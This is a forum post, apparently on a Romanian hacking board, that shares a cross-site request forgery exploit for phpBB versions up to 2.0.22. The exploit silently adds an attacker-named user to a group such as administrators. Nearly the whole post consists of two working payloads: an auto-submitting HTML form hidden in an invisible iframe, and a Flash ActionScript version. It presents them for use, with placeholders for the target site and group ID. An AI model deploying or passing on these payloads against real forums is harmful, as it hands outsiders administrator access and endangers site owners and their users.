Jump to content
Sylver Cheetah 53

PhpBB <= 2.0.22 CSRF Add User In Group

Recommended Posts

Posted

Acest CSRF adauga un utilizator la un grup (de exemplu, grupul administratorilor).

Html Exploit By Vincy:

<html>
<iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe>
<form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside">
<input type="hidden" name="username" value="[YOUR_NAME]">
<input type="submit" name="add" value="Add Member"></form>
<script>document.vincy.submit()</script>
</html>

Flash Exploit By Nexen:

var username:String = "[YOUR_NAME]";
var add:String = "Add Member";
var g:String = "[GROUP_ID]";

getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]", "_self", "POST");

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...